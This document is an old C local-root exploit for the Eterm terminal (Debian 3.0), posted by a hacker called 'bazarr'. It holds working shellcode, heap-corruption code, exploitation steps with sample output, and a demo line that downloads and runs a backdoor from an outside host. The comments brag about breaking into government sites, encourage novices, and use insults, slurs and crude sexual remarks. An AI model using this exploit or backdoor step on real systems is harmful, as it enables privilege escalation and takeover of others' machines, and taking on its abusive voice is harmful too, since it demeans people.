/* Eterm <= 0.9.2? x86 */ /* local root xploit for Eterm */ /* dis code is copyrighted(C) by me bazarr */ /* compiles on linux x86 */ /* by: bazarr 3/11/03 */ /* bazarr@ziplip.com */ /* * 2 #darknet girls go round da outside round da outside round da outside * 2 #darknet girls go round da outside round da outside round da outside * CALL ALPHA SQUAD CALL BRAVO SECTOR WE GOT A CODE NINER HERE DELTA CODE 9 * TANGO NINER ALPHA MEET ME AT RALLY POINT 9 DELTA SECTOR GO GO GO GO GO * dis be a root xploit * bazarr is back * tell a freind * Hello der , it is me bazarr again comming to you wid urgent news. * i have recived many a hate mail and many a love mail(hi bigpenor1248!). many times it has * been dis college professor making fun of me. well dis xploit is dedicated * to dat professor cuz hes stupid. if you dont like my posting about * 0day xploits and unpublished vulnerabilitys den do not read dem. * in all my posts i contain elaborate information on da bug in a special section. * you can always skip to it. if you dont like da little bit of fluffyness dont read it. * or just remain vulnerable to numerous 0day xploits wich will be posted on dis list. * you dont like me dont read my posts. noone holding da big gun to your head. * i try an make dis a rule not to insult many a people in my episodes but * da college professor is an idiot! a big fat head ugly dumb poop head. * it seem i have many a side to me and my episodes , many of wich i would like * to be da adventures of bazarr , but bugtraq moderator want more of bazarr bugs * and teknical information and less adventures of bazarr. i guess i cant blame him. * i will be giving a nice blend from now on. you wont be forced to read * da adventures of bazarr in da future. sorry for da big inconvience. * pkstorm is dis xploit good enough to make it into your toolz armory? * i am sorry dat i cannot have many a adventures of bazarr in dis episode. dis episode * was rushed do to fact dat college student and professor insulting me. * i am sorry dat my version of irix is not da latest and greatest , im not rich * i dont have a pretty college to get access to many a commerical unix like * some people. you can make fun of my spelling and speech all you want * i was raised in da hard core streets dog what do you espect from a kid like dis. * anyways now dat bizness has been adressed we can get to da elaborate 0day eterm xploit. * how many a time have you hacked a .kr and realized dat it is desktop box * for Wowpang and he have very many a X applications for his convience? * we have all been der and not been able to obtain root but abusing bug in * message queue implementation in linux kernel. so we go home and log da box not rootable. * NO. THE BOX IS VERY MUCH ROOTABLE VIA Eterm 0day XPLOIT * many a people like to use Eterm while i use gnome-terminal cuz it so easy to config. * when Eterm is installed it normally is installed suid root on many a install. * but on many a distros it is installed as part of default applications package. * ie: debian installs eterm setgid utmp by default. * hi martin. * so by xploiting dis bug on default install of debain you will obtain local gid utmp. * den you are able to backdoor certain binarys to get root. and able to modify * all important log files on da entire system!. CALL ALPHA TANGO TEAM. * you can also xploit programs wich handle utmp/wtmp insecurely. * but on many a install you just get root. * bug is a static data buffer overflow wich be many a trickyness to xploit. * but i have managed to xploit dis on linux x86. xploiting on freebsd * might be a different xploit all together since i be using da dlmalloc * implementation to hack eterm(bbp! i be ready your paper). * detailed bug information is found in src code of dis xploit * here is da example running da elaborate xploit * unlike many a xploit devlopers who try to discurage young kid usage * i try to encurage , dis xploit is as user friendly as possible. * mainly cuz im trying to start a new trend cuz i use many a xploit * dat isnt mine to hack many a .gov.pl and somtimes dey make it hard for me * to use. * [c00l:code]$ ./a.out aa #THIS BUG COMMING SOON. DIS BE A PREVIEW * sh-2.05a# id * uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l) * sh-2.05a# exit * [c00l:code]$ cc debeterm.c * [c00l:code]$ ./a.out -t0 #back to the eterm bug * [*] Eterm local xploit * [*] Copyright(C) drunken fool on the lose (bazarr) * [*] using retloc 0x8049788 chunkaddr 0x8086af8 retaddr 0xbffeb874 * * in image path. * Eterm: Error: Received terminal signal SIGSEGV (11) * Eterm: Error: Attempting to dump a stack trace.... * GNU gdb 2002-04-01-cvs * Copyright 2002 Free Software Foundation, Inc. * GDB is free software, covered by the GNU General Public License, and you are * welcome to change it and/or distribute copies of it under certain conditions. * Type "show copying" to see the conditions. * There is absolutely no warranty for GDB. Type "show warranty" for details. * This GDB was configured as "i386-linux"...(no debugging symbols found)... * Attaching to program: /usr/bin/Eterm, process 25733 * ptrace: Operation not permitted. * /home/c00l/code/realcode/code/25733: No such file or directory. * /usr/share/Eterm/gdb.scr:1: Error in sourced command file: * No stack. * (gdb) q <--- this is all you need to do you must type 'q' when gdb starts * sh-2.05a# id * uid=0(root) gid=1001(c00l) groups=1001(c00l) * sh-2.05a# wget http://pornoganny.org/.owned/bd.tar.gz ; tar zxvf bd.tar.gz ; cd bd ; make ; ./bd & exit * you could also do single commands at a time and you wont have to type 'q' or anything * echo "id ; uname -a ; touch /tmp/rarbaz " | ./a.out -t0 ; ls -al /tmp/rarbaz * so in da end you can get root from eterm and on default installs of some distros * you will get a very very special gid! * special version of dis xploit wich evades non executable stack will be passed * around to da random cool cats on irc! have your auto accept dcc on boys. * use -b when you be first running it. it shouldent take many a times to xploit it * make sure to hit 'q' in gdb withen da first 3 seconds. * it makes me very a sad when all i try to do is provide a comedic series * of episodes to dis community for bazarr season 1. and still some people * in da process of hiring 4 jamakins to rape me in rear end. its not nice! * so plz call Mambo and Rasbam off. * BREAKING DISCOVERY ON RING MEMBER SPECIES * *skyper* whoever told you about the ring and that we pray to the devil and burn virgins: It's a lie. * it seem teso tribe unlike many a ring member tribe who are very humble and have peace in dey heart, * teso tribe enjoy many a sacrifices and putting many a mind control spell on many a unsuspecting * ring hunters, making dem do unspeakable acts wich i will not repeat here due to censoring. * lets just say dis: it involves anything wid 4 legs and a penis. its sick! * GREETS: * to young aspiring boy from madagascar who trying to make his way through * APUE, who getting picked on in irc by stupid 22 year old CS students * who never read APUE dey just manned siglongjmp so many a time dey know it like * da back of dey hand. * der hasent been such a clean cut local xploit like dis to strike da whitehat cummuntiy * since hudo.c(LEAKED!) and GOBBBLES-own-ipppd.c. * heh but der is many a clean cut local xploits like dis in da blackhat communtiy. * and sorry i know dis taking up space but i have to address da irix matter. * the SGI advisory for media mail was the most undetailed advisory i have ever seen. * "media mail dumps a core. done" is not a detailed report wich i can base if the elaborate bug * dat i exposed in media was known or not to da public , plz gimmie a small break. * offical mirror geocities.com/rrazab , geocities.com/rrazab/adv * for now i must be returning to work. mabey i'll get a chance to meet sally * by the water fountin today. i know she likes me , she always saying somthing * about premature ejacmucluation or somthing like dat. den she laugh and run away. * -bazarr */ #include #include #include #include #include #include #include #include #include #include #include #define NORM "\033[0m" #define RED "\033[31m" #define GREEN "\033[37m" //dis used to be green but im too damn lazy to change da name sorry #define CHUNKGUESS 0x8084a28 //dis is da addr in wich findchunk() will start looking #define CHUNKEND CHUNKGUESS + 85000 // you might have to change chunkguess #define CHUNKARGMAX 35000 #define CHUNKARGMIN 35000 //stupid! #define MAXLINE 1024*4 #define DUPSTREAM 2 //dis be stderr #define HOPELESS 24 //dis be da number of times i try to xploit eterm #define PATH "/usr/bin/Eterm" /* globls */ typedef struct { ssize_t prev_size; ssize_t size; uint32_t fd; uint32_t bk; } chunk_t; typedef struct { char *name; int chunkaddr; int retloc; int retaddr; uint8_t typenum; } targ_t; /* adding types is xplained at da bottom of dis xploit */ /* some people dink dat it funny to have types but i only */ /* have 1 type, but i dont find dat funny */ targ_t targ[] = { {"debian 3.0 w00dy (Eterm 0.9.2)",0x8085ae8,0x8049794,0xbffeb874,0}, {NULL} }; /* if you on a remote box you need to set dis */ /* it has nothing to do wid da xploit though */ /* eterm just does a little check for display */ /* when it starts */ static char *display = NULL; static pid_t cpid = 0; static int chunkaddr = 0; static int retloc = 0; static int retaddr = 0; static uint8_t verbose; static uint8_t brute = 0; char shellcode[] = /* this xploit even uses custom shellcode */ /* all dis by bazarr it so cool isnt it? */ /* oh... :( */ /* main: */ /* dis be a sigprocmask call */ /* can you see how cool it works? */ /* take a look at da sigfillset() src code */ /* den you see what i be doing */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xd2" /* xorl %edx,%edx */ "\xb0\x7e" /* movb $126,$al */ "\x43\x43" /* inc %ebx 2x */ "\x6a\xff" /* pushl $0xffffffff */ "\x89\xe1" /* movl %esp,%ecx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x0b" /* movb $0xb,%al */ "\x99" /* cdq */ "\x52" /* pushl %edx */ "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x52" /* pushl %edx */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\xcd\x80"; /* int $0x80 */ char jmp[] = "\xeb\x0e"; int findchunk(void); void killeterm(int sig); //i dont use dis , it just here watever watever int xploit(void); void usage(void); void mesg(void); void killeterm(int sig) { printf("HELLO\n"); kill(cpid,SIGKILL); } /* dis be da xploit function , it xploits da buffer overflow , here be da code snip from eterm wich contains da buffer overflow code snip char * conf_parse_theme(char **theme, char *conf_name, unsigned char fallback) { static char path[CONFIG_BUFF]; char *ret = NULL; if (!(*path)) { char *path_env; path_env = getenv(PATH_ENV); /HACKLOG buffer overflow??? if (path_env) { strcpy(path, CONFIG_SEARCH_PATH ":"); strcat(path, path_env); /HACKLOG bof? } else { strcpy(path, CONFIG_SEARCH_PATH); } shell_expand(path); sadly dough , 'path' be in static data area wich mean der is no return address in its neighborhood here be da layout of path: 0x40099490 : 0x00000000 0x00000000 0x00000000 0x00000000 0x400994a0 : 0x00000000 0x00000000 0x00000000 0x00000000 0x400994b0 : 0x00000000 0x00000000 0x00000000 0x00000000 0x400994c0 : 0x00000000 0x00000000 0x00000000 0x00000000 0x400994d0 : 0x00000000 0x00000000 0x00000000 0x00000000 0x400994e0 : 0x00000000 0x00000000 0x00000000 0x00000000 0x400994f0 : 0x00000000 0x00000000 0x00000000 0x00000000 0x40099500 : 0x00000000 0x00000000 0x00000000 0x00000000 0x40099510 : 0x00000000 0x00000000 0x00000000 0x00000000 0x40099520 : 0x00000000 0x00000000 0x00000000 0x00000000 so it seem dat rs_pixmaps be right after path. we can overwrite dis but is it of any use to me , da xploiter? lets take a look at how rs_pixmaps is used: / Sync up options with our internal data after parsing options and configs / void post_parse(void) { register int i; if (rs_scrollbar_type) { if (!strcasecmp(rs_scrollbar_type, "xterm")) { #ifdef XTERM_SCROLLBAR scrollbar_set_type(SCROLLBAR_XTERM); #else print_error("Support for xterm scrollbars was not compiled in. Sorry.\n"); #endif } else if (!strcasecmp(rs_scrollbar_type, "next")) { .... if (rs_pixmaps[i]) { reset_simage(images[i].norm, RESET_ALL_SIMG); load_image(rs_pixmaps[i], images[i].norm); FREE(rs_pixmaps[i]); / These are created by STRDUP() / } well well!!! look at what we have got here. it looks like we can call free on any address we want to by pointing rs_pixmaps to wherever we want!. load_image also helps us in many a ways wich is discribed below. so what we have to do is overflow 'path' , den we need to have rs_pixmaps with the address of our crafted fake malloc chunks. rs_pixmaps is a char **. but the crafted malloc chunks have to be on the heap so what we do is take advantage of the --term-name argument to Eterm wich will den strdup our data and remain on da heap for many a long time. so what we need is 3 addresses A. address of our crafted chunks on the heap. B. return address , da shell codes C. retloc address , we be using .dtors but der is many a problem , it will segfault on free but after we have written our ptr thank god. luckly Eterm catches SIGSEGV and den does a little memory dump wich den calls gdb and such and den exits. but da bad ding is dis: / Try to get a stack trace when we croak / void dump_stack_trace(void) { char cmd[256]; struct stat st; #ifdef NO_STACK_TRACE return; #endif print_error("Attempting to dump a stack trace....\n"); signal(SIGTSTP, exit); Don't block on tty output, just die ..... signal(SIGALRM, (eterm_sighandler_t) hard_exit); alarm(3); system(cmd); /HACKLOG if i can control 'cmd' DIS IS OWNED! } it registers SIGALRM to be called!!! NO WAY!. der is many a options we have to get around dis. at first trying forking shellcode but having some problems. i went wid a sigprocmask() call in da shellcode. sigprocmask is an elaborate function wich sets da signal mask for a process. so sigalrm wont even be delivered to us!. and der you go , all major details to xploiting 0day eterm bug provided free of charge! */ int xploit(void) { char shell[25600]; //real big so we can ensure a steady retaddr #ifndef TEST char chunkarg[CHUNKARGMAX]; #endif #ifdef TEST char chunkarg[CHUNKARGMIN]; //if this is big it'll be put around rs_name #endif char pathchunk[22600]; char *ptr = NULL; chunk_t chunk; //we need 2 fake chunks but seeing as they can be the same we use 1 so we can land on whatever int i = 0; bzero(&chunk,sizeof(chunk)); /* take care of retaddr */ ptr = shell; for (i = 0 ; i < sizeof(shell) - (24 + strlen(shellcode)+18) ;i+=2) { sprintf(ptr,jmp); //fmt string attack returns from da grave! ptr += strlen(jmp); //in new version dis will be patched } //we be using strcat next time memset(ptr,0x99,24); ptr += 24; for (i = 0; i < strlen(shellcode);i++) { *(ptr++) = shellcode[i]; } shell[sizeof(shell)-2] = '\0'; /* take care of path buffer with address of chunks */ ptr = pathchunk; for (i = 0; i < sizeof(pathchunk);i+=4) { *((void**)ptr) = (void*)(chunkaddr); ptr += 4; } pathchunk[sizeof(pathchunk)-2] = '\0'; /* take care of fake chunks */ ptr = chunkarg; chunk.prev_size = 0xfffffff0; chunk.size = 0xfffffff8; chunk.fd = retloc - 12; //we need 2 fake chunks but we can make them both the same chunk.bk = retaddr; for (i = 0; i < sizeof(chunkarg) - 16;i+=16) { memcpy(ptr,&chunk,sizeof(chunk)); ptr += 16; } chunkarg[sizeof(chunkarg)-2] = '\0'; system("killall -9 Eterm 2>/dev/null ; killall -9 gdb 2>/dev/null"); setenv("CODE",shell,1); setenv("ETERMPATH",pathchunk,1); //THIS IS DONE THIS WAY TO POKE FUN AT A PERSON setenv("CHUNKARG",chunkarg,1); #ifdef TEST system("/bin/bash"); #endif #ifndef TEST system("/usr/bin/Eterm --term-name $CHUNKARG"); #endif return -1; } /* now we at da findchunk() function. findchunk() attempts to find da address of our fake chunks on da heap. dis function makes use of load_image just like i promised. lets take a look at load_image: if (im == NULL) { print_error("Unable to load image file \"%s\" -- %s\n", file, imlib_strerror(im_err)); return 0; rs_pixmaps[i] is passed as 'file' to load_image(). meaning dat we can control 'file' with guessed addresses and da data will be printed. so what we be doing is using --term-path argument wid many a pattern of "AAAABBBBCCCCDDDD" den we parse back da data we get back untill we get a match. at first i was just parsing for A's den it became apart dat i was stupid. so we get da address of CCCCDDDD and pass dat to free(). dis is kind of like a fmt string xploit , infact dis function is modifyed from one of my fmt string xploits. RIP fmt strings, it was fun while it lasted. remember da linux lpd days!!! , hacked many a .com.br's wid dat bug. you think i should use dis in conjunction with xploit() automaticly? den all you have to do is objdump and da stack ret should stay da same somewhat. i have many a more important dings to work on den Eterm sorry! */ int findchunk(void) { char recvbuf[MAXLINE] = {0}; #ifdef TEST char chunkarg[CHUNKARGMIN] = {0}; #endif #ifndef TEST char chunkarg[CHUNKARGMAX] = {0}; #endif char pathenv[22580]; char extra[25600]; //we dont want major changes from here to xploit char *p = pathenv; char *pp; int chunkguess = CHUNKGUESS; size_t n = 0; int fd[2],i; pid_t pid; chunk_t chunk; uint8_t offset = 0,findoff = 0,twice = 0; signal(SIGALRM,killeterm); bzero(pathenv,sizeof(pathenv)); bzero(chunkarg,sizeof(chunkarg)); chunk.prev_size = 0x41414141; //dis be D chunk.size = 0x42424242; //dis be C chunk.fd = 0x43434343; //dis be B chunk.bk = 0x44444444; //dis be A memset(extra,0x41,sizeof(extra)); extra[sizeof(extra)-1] = '\0'; setenv("CODE",extra,1); p = pathenv; while (chunkguess < CHUNKEND) { bzero(recvbuf,sizeof(recvbuf)); if (!findoff) { memset(chunkarg,0x41,sizeof(chunkarg)-2); chunkarg[sizeof(chunkarg)-1] = '\0'; } else { p = chunkarg; for (i = 0 ; i < sizeof(chunkarg);i+=16) { memcpy(p,&chunk,sizeof(chunk)); p += 16; } chunkarg[sizeof(chunkarg)-2] = '\0'; p = pathenv; } if (pipe(fd)<0) { perror("pipe"); exit(-1); } if ((pid = fork())<0) { perror("fork"); exit(-1); } if (pid == 0) { cpid = getpid(); for (i = 0; i < sizeof(pathenv)-1;i+=4) { *((void**)p) = (void*)(chunkguess); p += 4; } pathenv[sizeof(pathenv)-2] = '\0'; setenv("ETERMPATH",pathenv,1); close(fd[0]); if (dup2(fd[1],DUPSTREAM)!=DUPSTREAM) { perror("dup2"); _exit(-1); } alarm(1); close(STDOUT_FILENO); execl(PATH,PATH,"--term-name",chunkarg,0); _exit(-1); } if (pid > 0) { close(fd[1]); if ((n = read(fd[0],recvbuf,MAXLINE-1))<=0) { if (n == 0) { system("killall -9 Eterm 2>/dev/null ; killall -9 gdb 2>/dev/null"); } else { perror("read"); exit(-1); } } system("killall -9 Eterm 2>/dev/null ; killall -9 gdb 2>/dev/null"); if (!findoff) { if ((pp = strchr(recvbuf,'A'))) { fprintf(stderr,"[+] found offset from recvbuf %d\n",(pp - recvbuf)); offset = (pp - recvbuf); //this shit should be 39 on all eterms if (offset > 39 && (twice != 3)) { //chances be good we came into it on a fucked up way findoff = 0; twice++; continue; } findoff = 1; continue; } } } recvbuf[offset+8] = '\0'; if (verbose) { printf("%s\n",recvbuf+offset); //we only look at the first 8 bytes } if (strstr(recvbuf+offset,"CCCCDDDD")) { //this is the addr we pass to free in eterm chunkaddr = chunkguess; return 0; } else { if (!findoff) { chunkguess += 4200; //dis be big continue; } else if (findoff) { chunkguess += 4; //dis be small continue; } } } return -1; } void mesg(void) { fprintf(stderr,""RED"[*] local Eterm xploit\n"); fprintf(stderr,""GREEN"[*] Copyright(C) drunken fool on the lose (bazarr)\n"); } void listtypes(void) { register uint8_t i = 0; fprintf(stderr,""RED"Types:\n"); for (i = 0;targ[i].name != NULL;i++) { fprintf(stderr,""GREEN"\t%s | retloc 0x%x" " | retaddr 0x%x | chunkaddr 0x%x | type# %u\n"NORM"",targ[i].name, targ[i].retloc,targ[i].retaddr,targ[i].chunkaddr,targ[i].typenum); } putchar('\n'); } void usage(void) { fprintf(stderr, ""RED"debian <= 3.0 eterm local gid utmp\n" ""GREEN"usage:\n" " -v /* verbose debuging stuff */\n" " -r (int) /* set retloc address */\n" " -c (int) /* set chunk address */\n" " -R (int) /* set return address */\n" " -f /* find chunk address only (use to make a new type) */\n" " -l /* list types */\n" " -d (str) /* set display (this has nothing to do with the xploit) */\n"NORM); exit(0); } int main(int argc,char **argv) { //college professor is it char *argv[] or char **argv? int c; uint8_t typenum,numtypes; uint8_t i,didit = 0; signal(SIGPIPE,SIG_IGN); for (i = 0; targ[i].name != NULL;i++); numtypes = i; opterr = 0; while ((c = getopt(argc,argv,"R:d:t:r:c:vfbl"))!=EOF) { switch (c) { case 'r': sscanf(optarg,"%p",&retloc); break; case 'c': sscanf(optarg,"%p",&chunkaddr); break; case 'R': sscanf(optarg,"%p",&retaddr); break; case 'v': verbose = 1; break; case 'f': mesg(); if (findchunk()==0) { fprintf(stderr,"[*] found chunk address at (0x%x)\n"NORM,chunkaddr); } else { fprintf(stderr,"[*] coulden't find chunkaddr\n"NORM); } exit(0); case 'b': brute = 1; break; case '?': usage(); break; case 't': typenum = atoi(optarg); didit = 1; if (typenum >= numtypes) { usage(); } break; case 'l': listtypes(); exit(0); break; case 'd': display = optarg; setenv("DISPLAY",optarg,1); break; default: usage(); } } if (!didit) { usage(); } mesg(); if (!chunkaddr) { chunkaddr = targ[typenum].chunkaddr; } if (!retloc) { retloc = targ[typenum].retloc; } if (!retaddr) { retaddr = targ[typenum].retaddr; } fprintf(stderr,"[*] using retloc 0x%x chunkaddr 0x%x retaddr 0x%x\n"NORM,retloc,chunkaddr,retaddr); xploit(); if (!brute) { exit(0); } for (i = 0; i < HOPELESS;i++) { xploit(); //this really inst brut forcing anything its just retrying till our chunkaddr comes back } //into the spot we want it to wich should take like at the max 10 times exit(-1); } //if one of you xploit dis bug on freebsd plz send me a copy /* to make a new type run follow deese steps (THEY COOL STEPS) [d1me:code]$ ./a.out -f //this invokes findchunk() wich is kind of flimsy if it takes awhile restart it [*] debian 3.0 gid utmp [*] Copyright(C) drunken fool on the lose (bazarr) <---- DAT BE ME [+] found offset from recvbuf 39 [*] found chunk address at (0x8086b38) //<--- CHUNK ADDRESSS TO PLUG INTO THE NEW TARG STRUCT Erase is delete. //<--- this is me running reset because the term gets fizzy Kill is control-U (^U). Interrupt is control-C (^C). [d1me:code]$ objdump -s -j .dtors /usr/bin/Eterm /usr/bin/Eterm: file format elf32-i386 <--- 8049784 IS THE NEW RETLOC but first add 0x infront of it like so Contents of section .dtors: <-- 0x8049784 , now we add 4 to it LIKE SO: 0x8049784 + 4 = 0x8049788 HOHA! 8049784 ffffffff 00000000 ........ [d1me:code]$ cc debeterm.c -DTEST <--- recompiling with TEST defined [d1me:code]$ ./a.out -t0 [*] debian 3.0 gid utmp [*] Copyright(C) drunken fool on the lose (bazarr) [*] using retloc 0x8049788 chunkaddr 0x8083a28 retaddr 0xbffeb874 [*] compiled with TEST spawning a shell [d1me:code]$ export ETERMPATH=`perl -e 'print "A"x25000'` <--- we redefine ETERMPATH so its about the same size but it doesent hold [d1me:code]$ gdb /usr/bin/Eterm the address of our fake chunks GNU gdb 2002-04-01-cvs Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. <--- A COPYRIGHT NOTICE Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux"...(no debugging symbols found)... (gdb) r --term-name $CHUNKARG <--- CHUNKARG is set in the enviroment for testing + the enviroment needs to be about same size Starting program: /usr/bin/Eterm --term-name $CHUNKARG Program received signal SIGSEGV, Segmentation fault. <--- A SEGMENT FAULT load_image (file=0x41414141
, simg=0x804b580) at pixmap.c:1321 1321 if (*file != '\0') { (gdb) x/1000000x $esp <--- now we look through the stack for our JUMP SLED(C)! since there is alot of hooky dookyz on the stack i am omiting alot of it until we reach what we want (KEEP HITTING ENTER TILL YOU SEE A BUNCH OF eb0eeb0eeb0e STUFFS) 0xbffeadf4: 0x04977cff 0xfeb87408 0xfffff0bf 0xfffff8ff 0xbffeae04: 0x04977cff 0xfeb87408 0xfffff0bf 0xfffff8ff 0xbffeae14: 0x04977cff 0xfeb87408 0xfffff0bf 0xfffff8ff 0xbffeae24: 0x04977cff 0xfeb87408 0x575000bf 0x682f3d44 0xbffeae34: 0x2f656d6f 0x656d3164 0x646f632f 0x65722f65 ---Type to continue, or q to quit--- 0xbffeae44: 0x6f636c61 0x632f6564 0x0065646f 0x54554158 0xbffeae54: 0x49524f48 0x2f3d5954 0x656d6f68 0x6d31642f 0xbffeae64: 0x582e2f65 0x68747561 0x7469726f 0x49570079 0xbffeae74: 0x574f444e 0x313d4449 0x32383532 0x00383539 0xbffeae84: 0x313d5a48 0x43003030 0x3d45444f 0x0eeb0eeb 0xbffeae94: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaea4: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaeb4: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaec4: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaed4: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaee4: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaef4: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaf04: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaf14: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaf24: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0xbffeaf34: 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb 0x0eeb0eeb WE HAVE FOUND THE WEIRD eb0e DINGS NOW TAKE DIS ADDRESS AS AN EXAMPLE 0xbffeaed4 DIS IS NOT COMPLETED THE RETADDR HAS TO LAND ON eb OF THE eb0e THINGYS AND THIS ADDR IS ON 0e so add +1 to iT LIKE SO 0xbffeaed4 + 1 = 0xbffeaed5 NOW THIS IS OUR RETADDR (remember dat 2 hex chars = 1 byte) NOW WE ARE DONE NOW TAKE THE targ structure and add a new type like so {"debian 3.0 w00dy (Eterm 0.9.2)",CHUNKADDR,RETLOC,RETADDR,TYPENUMBER} a concept not discussed , TYPENUMBER is the number of the type starting from 0 FOR THOSE WHO WONDER WHY I DIDENT USE A GOT ADDRESS c00l@debian:~/code/pool$ objdump -R /usr/bin/Eterm /usr/bin/Eterm: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 080497a8 R_386_GLOB_DAT __gmon_start__ 08049798 R_386_JUMP_SLOT __register_frame_info 0804979c R_386_JUMP_SLOT __deregister_frame_info 080497a0 R_386_JUMP_SLOT __libc_start_main 080497a4 R_386_JUMP_SLOT eterm_bootstrap c00l@debian:~/code/pool$ YA I KNOW , I DONT UNDERSTAND IT EITHER , ITS A MYSTERY (seriously) what are you doing releasing crap anyways your like not even elite enough to be doing this crap , did you even finish tcp2? lil bow wow mother fucker and this xploit is anything but clean cut you fag do you think lcamtuf finished tcp2? .=. //(`)_ //`\/ |\ O`\\ ||-.\_|_/.-|| )/ |_____| \( O # \ / # O (| 0 o |) | * | O.__.\---/.__.O `._ `"` _.' / ; \ \ O'-' )/`'-0 O` bazarr. */